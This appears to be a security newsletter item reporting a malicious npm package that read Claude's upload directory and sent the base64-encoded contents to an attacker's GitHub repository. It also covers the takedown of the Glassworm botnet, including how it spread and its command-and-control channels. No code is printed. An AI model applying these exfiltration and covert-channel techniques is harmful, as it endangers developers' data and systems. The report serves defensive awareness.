The Intake — Thursday, May 28, 2026

mouse5212-super-formatter is a malicious npm package identified by OX Security as part of a campaign they name "Malware-Slop." It reads from /mnt/user-data, the directory Claude uses for uploads and outputs. The package then base64-encodes whatever it finds there and writes it to a threat-actor-controlled GitHub repository via the GitHub Contents API.

The attacker hardcoded their own GitHub private token in the payload. OX researchers extracted the token; the account behind it was created May 26 and deleted after exposure. OX observed approximately seven active exfiltrations before takedown. The package had 676 downloads and remained live on npm at the time OX published.

The package was removed. Developers who installed mouse5212-super-formatter alongside an active Claude instance have a specific exposure: the payload read from /mnt/user-data, the directory Claude uses for uploads and outputs.

Glassworm was a developer-targeting botnet active from October 2025 through its May 27, 2026 disruption. CrowdStrike, Google, and the Shadowserver Foundation executed a coordinated takedown at 1400 UTC on May 27. Compromised machines now beacon to a CrowdStrike-operated sinkhole at 164.92.88[.]210.

The botnet spread through VS Code extensions on the OpenVSX marketplace, npm packages, and Python packages. Public GitHub repositories were also a distribution channel. Each infection deployed GlasswormRAT. For C2, the botnet used Solana blockchain transactions as the primary channel and Google Calendar events as a backup. BitTorrent DHT served configuration distribution.

Glassworm targeted developer machines specifically and spread through the registries and marketplaces developers use in ordinary workflow. The sinkhole is live. CrowdStrike's blog post carries indicators of compromise.